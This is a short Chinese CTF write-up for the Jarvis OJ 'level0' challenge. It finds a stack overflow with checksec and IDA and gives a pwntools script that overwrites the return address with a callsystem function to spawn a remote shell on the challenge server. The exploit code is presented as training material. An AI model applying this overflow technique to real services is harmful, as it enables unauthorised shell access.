checksec 一波,只开了NX

image.png
再IDA看一下程序 ,栈溢出,再找一找有没有可用的函数

image.png
发现了这个

image.png
exp:
#-*- coding:utf-8 -*-
from pwn import *
# p = process('./level0')
p = remote("pwn2.jarvisoj.com","9881")
callsystem = 0x400596
payload = 0x80*"A" + p64(0) + p64(callsystem)
p.sendline(payload)
p.interactive()